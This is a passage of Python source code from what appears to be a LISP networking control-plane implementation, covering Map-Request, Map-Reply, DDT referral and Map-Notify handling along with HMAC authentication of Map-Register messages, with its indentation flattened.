rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and last_node in ref.referral_set):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in list(referral.referral_set.values()):
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache.lookup_cache(eid_record.group, True)
if (mc):
mc = mc.lookup_source_cache(eid_record.eid, False)
#endif
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
rloc_name = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data included in RLOC record..
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Store RLOC name for multicast RLOC members records.
#
if (rloc_name == None):
rloc_name = rloc.rloc_name
#enif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc, rloc_name)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password.encode(), packet, hashalg).hexdigest()
else:
hashval = hmac.new(password.encode(), packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in list(sg_site_eid.individual_registrations.values()):
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = list(temp_set.values())
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if ("signature" not in json_sig): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
